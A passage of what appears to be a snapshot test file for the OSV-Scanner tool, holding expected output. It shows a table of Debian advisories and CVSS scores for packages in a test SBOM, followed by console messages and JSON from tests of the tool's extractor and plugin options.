2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-19956 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-20388 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-7595 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3516 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3517 | 8.6 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3518 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3537 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3541 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-23308 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9714 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4319-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2026-0989 | 3.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0990 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0992 | 2.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-1 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-3 | | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4661-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4807-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4855-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4875-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4963-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5103-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5139-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5169-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5343-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5417-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5532-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5764-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6015-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6113-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0732 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0734 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0735 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-5407 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1543 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1549 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3450 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2274 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3358 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3602 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3786 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3996 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-4203 | 4.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0216 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0217 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0401 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-1255 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-2975 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3446 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3817 | | | | | | | | https://osv.dev/DLA-3530-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-5678 | 9.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0727 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-2511 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4741 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-5535 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-9143 | | | | | | | | https://osv.dev/DLA-3942-1 | | | | | | | | https://osv.dev/DLA-3942-2 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-6129 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-6237 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-12797 | 6.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-13176 | 4.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4176-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4603 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-11187 | 6.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15468 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15469 | 5.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-4575 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-66199 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9231 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2673 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5902-1 | 8.4 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12837 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12883 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-12015 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18311 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18312 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18313 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18314 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6797 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6798 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6913 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10543 | 8.2 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10878 | 8.6 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-12723 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-16156 | 8.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-31484 | | | | | | | | https://osv.dev/DLA-3926-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2021-36770 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-47038 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-40909 | 5.9 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5135-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3072-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3189-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3316-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3422-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3600-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3651-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3764-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-17512 | 8.8 | Debian | sensible-utils | 0.0.9+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-20482 | 4.7 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-39804 | 6.2 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3755-1 | | | | | | | | https://osv.dev/DLA-3051-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3134-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3161-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3366-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3412-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3684-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3788-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3972-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4085-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4105-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4403-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4016-1 | | Debian | ucf | 3.0036 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5055-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5650-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2779 | 7.8 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-3184 | | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5123-1 | 8.8 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5895-1 | 8.7 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-3094 | 10.0 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ --- [TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_multiple_files - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/empty_plugins_flag_does_nothing - 1] --- [TestCommand_ExplicitExtractors_WithDefaults/empty_plugins_flag_does_nothing - 2] Incorrect Usage: flag needs an argument: --experimental-plugins= flag needs an argument: --experimental-plugins= --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_specified_individually - 1] Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_specified_individually - 2] No package sources found, --help for usage information. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_specified_together - 1] Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_specified_together - 2] No package sources found, --help for usage information. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_with_presets - 1] Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_with_presets - 2] No package sources found, --help for usage information. --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_individually - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_individually - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_an_extractor_that_does_not_exist - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_an_extractor_that_does_not_exist - 2] not an exact name for a plugin: "custom/extractor" --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_one_specific_extractor_disabled - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_one_specific_extractor_disabled - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_one_specific_extractor_enabled_and_the_defaults - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_one_specific_extractor_enabled_and_the_defaults - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_one_different_extractor_enabled - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_one_different_extractor_enabled - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_one_specific_extractor_enabled - 1] Scanning dir ./testdata/locks-many/package-lock.json Scanned /testdata/locks-many/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_one_specific_extractor_enabled - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_parse_as_but_specific_extractor_disabled - 1] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_parse_as_but_specific_extractor_disabled - 2] could not determine extractor, requested package-lock.json --- [TestCommand_ExplicitExtractors_WithoutDefaults/empty_plugins_flag_does_nothing - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/empty_plugins_flag_does_nothing - 2] Incorrect Usage: flag needs an argument: --experimental-plugins= flag needs an argument: --experimental-plugins= --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_specified_individually - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_specified_individually - 2] at least one extractor must be enabled --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_specified_together - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_specified_together - 2] at least one extractor must be enabled --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_with_presets - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_with_presets - 2] at least one extractor must be enabled --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_individually - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_individually - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_an_extractor_that_does_not_exist - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/package-lock.json file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_an_extractor_that_does_not_exist - 2] not an exact name for a plugin: "custom/extractor" --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_one_specific_extractor_disabled - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_one_specific_extractor_disabled - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_one_specific_extractor_enabled_and_no_defaults - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/package-lock.json file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_one_specific_extractor_enabled_and_no_defaults - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_one_different_extractor_enabled - 1] Scanning dir ./testdata/locks-many/composer.lock --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_one_different_extractor_enabled - 2] No package sources found, --help for usage information. --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_one_specific_extractor_enabled - 1] Scanning dir ./testdata/locks-many/package-lock.json Scanned /testdata/locks-many/package-lock.json file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_one_specific_extractor_enabled - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_parse_as_but_specific_extractor_disabled - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_parse_as_but_specific_extractor_disabled - 2] could not determine extractor, requested package-lock.json --- [TestCommand_Filter/Show_all_Packages_with_empty_config - 1] { "results": [ { "source": { "path": "/testdata/locks-insecure/osv-scanner-with-unscannables.json", "type": "lockfile" }, "packages": [ { "package": { "name": "stdlib", "version": "1.999.1", "ecosystem": "Go" } }, { "package": { "name": "toolchain", "version": "1.24.4", 